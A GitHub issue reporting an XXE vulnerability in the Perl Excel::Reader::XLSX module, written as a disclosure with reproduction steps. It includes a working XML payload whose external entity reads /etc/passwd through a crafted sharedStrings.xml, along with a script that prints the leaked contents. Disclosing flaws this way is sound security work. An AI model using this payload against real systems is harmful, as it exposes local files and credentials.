XXE injection is possible via specially crafted excel file

The module is vulnerable to [XXE injection](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing) that allows to read local files, make network requests etc.

How to reproduce the issue:
1. Add XXE payload to `xl/sharedStrings.xml` like in the attached file

```
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
```
1. Run example from README.md:

```
use strict;
use warnings;
use Excel::Reader::XLSX;

my $reader = Excel::Reader::XLSX->new();
my $workbook = $reader->read_file( 'test2.xlsx' );

if ( !defined $workbook ) {
    die $reader->error(), "\n";
}

for my $worksheet ( $workbook->worksheets() ) {

    my $sheetname = $worksheet->name();

    print "Sheet = $sheetname\n";

    while ( my $row = $worksheet->next_row() ) {

        while ( my $cell = $row->next_cell() ) {

            my $row   = $cell->row();
            my $col   = $cell->col();
            my $value = $cell->value();

            print "  Cell ($row, $col) = $value\n";
        }
    }
}
```

As a result you'll see the content of your local `/etc/passwd` file

[test2.xlsx](https://github.com/jmcnamara/excel-reader-xlsx/files/523715/test2.xlsx)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

XXE injection is possible via specially crafted excel file #10

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development